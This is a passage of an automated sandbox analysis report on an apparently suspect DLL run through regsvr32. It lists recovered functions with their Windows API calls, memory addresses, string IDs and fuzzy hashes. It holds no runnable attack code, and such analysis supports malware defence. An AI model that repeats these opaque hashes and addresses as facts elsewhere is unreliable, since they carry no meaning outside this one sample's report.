                                                                  • __getptd.LIBCMT ref: 04F93DA1
                                                                    • Part of subcall function 04F939A5: __CallSettingFrame@12.LIBCMT ref: 04F939F1
                                                                    • Part of subcall function 04F93E6E: __getptd.LIBCMT ref: 04F93E7D
                                                                    • Part of subcall function 04F93E6E: __getptd.LIBCMT ref: 04F93E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 3282538202-0
                                                                  • Opcode ID: 78a2e994d0c7bf30a9674184c11b94725c17fdf72b8fda81513464e831a267d6
                                                                  • Instruction ID: 74a0609f49e9422fafbb53cc33540276d8201df1c054a41e37d584f3f69af4d8
                                                                  • Opcode Fuzzy Hash: 78a2e994d0c7bf30a9674184c11b94725c17fdf72b8fda81513464e831a267d6
                                                                  • Instruction Fuzzy Hash: 7711DA71D0020ADFEF00EFA4D944B9D7BF1FF08318F10816AE814AB250DB38AA569F54
                                                                  Function 02643673 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __CreateFrameInfo.LIBCMT ref: 0264369B
                                                                    • Part of subcall function 0264322B: __getptd.LIBCMT ref: 02643239
                                                                    • Part of subcall function 0264322B: __getptd.LIBCMT ref: 02643247
                                                                  • __getptd.LIBCMT ref: 026436A5
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 026436B3
                                                                  • __getptd.LIBCMT ref: 026436C1
                                                                  • __getptd.LIBCMT ref: 026436CC
                                                                    • Part of subcall function 026432D0: __CallSettingFrame@12.LIBCMT ref: 0264331C
                                                                    • Part of subcall function 02643799: __getptd.LIBCMT ref: 026437A8
                                                                    • Part of subcall function 02643799: __getptd.LIBCMT ref: 026437B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 3282538202-0
                                                                  • Opcode ID: ec3543f510356637c08229af0eb5953e989d91e34794377bc36418f8843f716b
                                                                  • Instruction ID: 0112794fd901d60c151d76c3e74101d71bad123a6e2ad8f75526c8a82a36050c
                                                                  • Opcode Fuzzy Hash: ec3543f510356637c08229af0eb5953e989d91e34794377bc36418f8843f716b
                                                                  • Instruction Fuzzy Hash: 951149B1C05209DFDB01EFA4D884BEE7BF1FF04310F5481A9E854A7250DBB89A119F94
                                                                  Function 02639906 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02645EB4,02647C00,00000008,02639A0E,00000000,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C), ref: 02639917
                                                                  • __lock.LIBCMT ref: 0263994B
                                                                    • Part of subcall function 0263C180: __mtinitlocknum.LIBCMT ref: 0263C196
                                                                    • Part of subcall function 0263C180: __amsg_exit.LIBCMT ref: 0263C1A2
                                                                    • Part of subcall function 0263C180: RtlEnterCriticalSection.NTDLL(?), ref: 0263C1AA
                                                                  • InterlockedIncrement.KERNEL32(02649720), ref: 02639958
                                                                  • __lock.LIBCMT ref: 0263996C
                                                                  • ___addlocaleref.LIBCMT ref: 0263998A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 637971194-0
                                                                  • Opcode ID: f5b094b5ba4cddfb46deb40ab861446f93bd0bc04dff94238ecc9614fc4e572d
                                                                  • Instruction ID: 34e4b71838977f7f2fade6259f0e577be2143d2ef694b0e688959e7d8ca4be9a
                                                                  • Opcode Fuzzy Hash: f5b094b5ba4cddfb46deb40ab861446f93bd0bc04dff94238ecc9614fc4e572d
                                                                  • Instruction Fuzzy Hash: 5A01C071845B00EFE721AF65C90474AFBE1EF60326F10894EE4D697390CBB0A640CF59
                                                                  Function 04F8E855 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F8E861
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F8E878
                                                                  • __amsg_exit.LIBCMT ref: 04F8E886
                                                                  • __lock.LIBCMT ref: 04F8E896
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 04F8E8AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: e1ecb88f92b0842774c6f29bde77af3f72ff2c3df1475626632d6863d63b8cab
                                                                  • Instruction ID: 7012d96c4b1e826b4dbd506b0ef32b12ab476e80a14f1f984ac9da1f73857ff4
                                                                  • Opcode Fuzzy Hash: e1ecb88f92b0842774c6f29bde77af3f72ff2c3df1475626632d6863d63b8cab
                                                                  • Instruction Fuzzy Hash: 3AF06D32E84A18AAFB24BB64AC0574E3BA0EF00728F10411ED510AF1C0CB647843CA56
                                                                  Function 0263E180 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0263E18C
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 0263E1A3
                                                                  • __amsg_exit.LIBCMT ref: 0263E1B1
                                                                  • __lock.LIBCMT ref: 0263E1C1
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0263E1D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: 4d39e369051f6f564bf6d3440415ab8c672199f938604d9dc2dd8ba514a51de1
                                                                  • Instruction ID: 791a33e9b83eeb4076e69ce8fb3a200329dbefb06ad0c238da8a710a20b565b8
                                                                  • Opcode Fuzzy Hash: 4d39e369051f6f564bf6d3440415ab8c672199f938604d9dc2dd8ba514a51de1
                                                                  • Instruction Fuzzy Hash: 00F0BE32D8A710DBE72BBBB49801B5E73E2AF00725F14420EE451A73C0CFA55542CEAD
                                                                  Function 6C861FC0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 269COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID: CriticalTripPoint$CurrentTemperature
                                                                  • API String ID: 1473721057-3920528518
                                                                  • Opcode ID: dbace2a264522963a30bb2e1dd280f85fd375d8b36585dba9ba9da48cdf51b50
                                                                  • Instruction ID: 7d27e77d01399446d767893627752b35b919108b9d9dd9d444be19bc1da23a44
                                                                  • Opcode Fuzzy Hash: dbace2a264522963a30bb2e1dd280f85fd375d8b36585dba9ba9da48cdf51b50
                                                                  • Instruction Fuzzy Hash: A6A1B2B19083009BD714CE2AC949B9BF7E9AFC4348F048E3DF59597A90E779E548CB42
                                                                  Function 6C87C400 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C87CC70: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000001), ref: 6C87CCEA
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 6C87C4CA
                                                                  • RegQueryValueExW.ADVAPI32(00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C539
                                                                  • RegCloseKey.ADVAPI32(?,00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C57E
                                                                    • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
                                                                  Strings
                                                                  • ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87C45D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Open$CloseErrorInfoQueryValue
                                                                  • String ID: ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 2599130380-3947172187
                                                                  • Opcode ID: 3f2c71bea10582427bfdbfa0ba810ec00d6cb9b347dc3a07f81bb02947771d8f
                                                                  • Instruction ID: 0ebda0d0d712106e897b77c1f5dc6c3c889e81b96f886e93e7a75f592538cd8c
                                                                  • Opcode Fuzzy Hash: 3f2c71bea10582427bfdbfa0ba810ec00d6cb9b347dc3a07f81bb02947771d8f
                                                                  • Instruction Fuzzy Hash: 62614AB5D002089BEB20DFA4DA45BEEBBB8FF55308F144425E804BB641F775DE098BA0
                                                                  Function 04F85F05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _memset$_vswprintf_s
                                                                  • String ID: D
                                                                  • API String ID: 3424173483-2746444292
                                                                  • Opcode ID: ad18f4a286e464ebda1c59b161c59facedf8c9e110f188be35c64217384010a6
                                                                  • Instruction ID: cce055b93c5e3b5d19c1b6a8023c38898461b740c9ad9fc94aa0326f359cac91
                                                                  • Opcode Fuzzy Hash: ad18f4a286e464ebda1c59b161c59facedf8c9e110f188be35c64217384010a6
                                                                  • Instruction Fuzzy Hash: 6F4179B1A40304ABE720DF70DC45FEA77B8EF54704F10459DB64DDB1C0DAB5AA858B58
                                                                  Function 04F940F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBCMT ref: 04F94108
                                                                    • Part of subcall function 04F94063: ___BuildCatchObjectHelper.LIBCMT ref: 04F94099
                                                                  • _UnwindNestedFrames.LIBCMT ref: 04F9411F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3487967840-3733052814
                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction ID: 16b4d96c52a675a85aadd7780c5692e7fe0401f071039b45db3ec49a0315aeab
                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction Fuzzy Hash: 49012431404119BBEF236F50CC85EAA3FAAEF28344F004010BD0855120D732EDB3DBA1
                                                                  Function 02643A20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBCMT ref: 02643A33
                                                                    • Part of subcall function 0264398E: ___BuildCatchObjectHelper.LIBCMT ref: 026439C4
                                                                  • _UnwindNestedFrames.LIBCMT ref: 02643A4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3487967840-3733052814
                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction ID: c1e1e3338b0aa5e7f680adb30db70634d38d9a268732e1c677b415817df7b6e4
                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction Fuzzy Hash: 5D01F27104110ABBDF12AF51CC44EEB7F6AEF18354F208159BD9815220EB32D9B1DFA4
                                                                  Function 6C92EE40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 256COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: '$+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-2653426196
                                                                  • Opcode ID: 92ce96908bd32a8c82add691a1806c5426f28ef92f7757c9edc28a6e5e88a48a
                                                                  • Instruction ID: 4695bb20287f52d6d83c17a41c1c0e6f39004dfc132f8c6acf4c7344bb48fc49
                                                                  • Opcode Fuzzy Hash: 92ce96908bd32a8c82add691a1806c5426f28ef92f7757c9edc28a6e5e88a48a
                                                                  • Instruction Fuzzy Hash: 53816272F002184BDB08CA9DDC917EEF7FAABD8354F19813AE519E7394E6749C048B90
                                                                  Function 6C856AE4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,?,attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs,00000035,6C9785A8), ref: 6C856BD3
                                                                  Strings
                                                                  • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 6C856B36
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                  • API String ID: 3510742995-1099963043
                                                                  • Opcode ID: df83d4c7c561ca74468cbb371acc0a9baffd7186c04f6be0f5afe545a9de0dab
                                                                  • Instruction ID: 5b799695bec4daf6d8a6aeec36873f98b06e22cfef3700667e22c57de3e8580b
                                                                  • Opcode Fuzzy Hash: df83d4c7c561ca74468cbb371acc0a9baffd7186c04f6be0f5afe545a9de0dab
                                                                  • Instruction Fuzzy Hash: 3F61CCB1E012099FDB10CF64C884BDEBBB5FF54308F144969E804AB761E7B5E914CB90
                                                                  Function 6C8F97E0 Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000,?), ref: 6C8F9852
                                                                  • ReadConsoleW.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F9862
                                                                  • GetLastError.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F9872
                                                                  • GetLastError.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F98EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$ConsoleRead
                                                                  • String ID:
                                                                  • API String ID: 2254617233-0
                                                                  • Opcode ID: 757bcecf1848567cd3311e32bf7836a7cb0e5b38261cf695ced46d1bbe024acc
                                                                  • Instruction ID: 4d2abbe3bd0493d2d128243d6646ee9305418fefe19d3cf51f88a5f6bf36354e
                                                                  • Opcode Fuzzy Hash: 757bcecf1848567cd3311e32bf7836a7cb0e5b38261cf695ced46d1bbe024acc
                                                                  • Instruction Fuzzy Hash: 0341DF71A01219ABDF10DFA4C980BEF77B8AF55368F148869E928A7740D731E942C7A0
                                                                  Function 6C8626D0 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsValidSid.ADVAPI32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8626E4
                                                                  • GetLengthSid.ADVAPI32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8626EE
                                                                  • CopySid.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C862717
                                                                  • CopySid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C86274F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Copy$LengthValid
                                                                  • String ID:
                                                                  • API String ID: 3824519660-0
                                                                  • Opcode ID: 61c158add2212a1f1b8d48715ea5f2ce2968d7809c6bbe3daa0d2a8437e72cc3
                                                                  • Instruction ID: e6218f134b5073c80d8872656c5c7a3e25aaa459dff0fa4398382d80b4c4fbee
                                                                  • Opcode Fuzzy Hash: 61c158add2212a1f1b8d48715ea5f2ce2968d7809c6bbe3daa0d2a8437e72cc3
                                                                  • Instruction Fuzzy Hash: 5431D870D013086BEB309F668D88FDBBAACAF56748F104865F904ABB41D7BDC90487B5
                                                                  Function 04F8A2BF Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 3556499859-0
                                                                  • Opcode ID: d640f9d809ed10fef1b179c7ca3851c6ae2fcadbee8e3c97a246e8732f721754
                                                                  • Instruction ID: dafdc9d521e7f201b7e22fcafba7dcc72392ee848bf34c0304d981940063f74e
                                                                  • Opcode Fuzzy Hash: d640f9d809ed10fef1b179c7ca3851c6ae2fcadbee8e3c97a246e8732f721754
                                                                  • Instruction Fuzzy Hash: BA315E31D40715FFDB21AFB5FD48AD63EA2EB84368754853BE404962B0EB74A4428F98
                                                                  Function 0263E465 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0263E499
                                                                  • __isleadbyte_l.LIBCMT ref: 0263E4CC
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0264AB6C,?,02645314,00000000,?,?,?,?,0264AB6C,02645314), ref: 0263E4FD
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0264AB6C,00000001,02645314,00000000,?,?,?,?,0264AB6C,02645314), ref: 0263E56B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 21a4a99c86c4800d9144e16af24a0218dfe942ac3b88dbf7f893ab931b26a57b
                                                                  • Instruction ID: c09561808c29b949a53b95123f8d7b15738eb9b890150ad9bd1105acdf14c9e2
                                                                  • Opcode Fuzzy Hash: 21a4a99c86c4800d9144e16af24a0218dfe942ac3b88dbf7f893ab931b26a57b
                                                                  • Instruction Fuzzy Hash: C431C532A00256EFDF12DF64C884ABD3BB5FF09325F148569E4659B292E333D940CBA0
                                                                  Function 02634420 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 0263443E
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0263444D
                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 0263449B
                                                                    • Part of subcall function 02633F50: GetCurrentThreadId.KERNEL32 ref: 02633F55
                                                                    • Part of subcall function 02633F50: send.WS2_32(?,02647440,00000010,00000000), ref: 02633FB6
                                                                    • Part of subcall function 02633F50: SetEvent.KERNEL32(?), ref: 02633FD9
                                                                    • Part of subcall function 02633F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02633FE5
                                                                    • Part of subcall function 02633F50: WSACloseEvent.WS2_32(?), ref: 02633FF3
                                                                    • Part of subcall function 02633F50: shutdown.WS2_32(?,00000001), ref: 0263400B
                                                                    • Part of subcall function 02633F50: closesocket.WS2_32(?), ref: 02634015
                                                                  Memory Dump Source
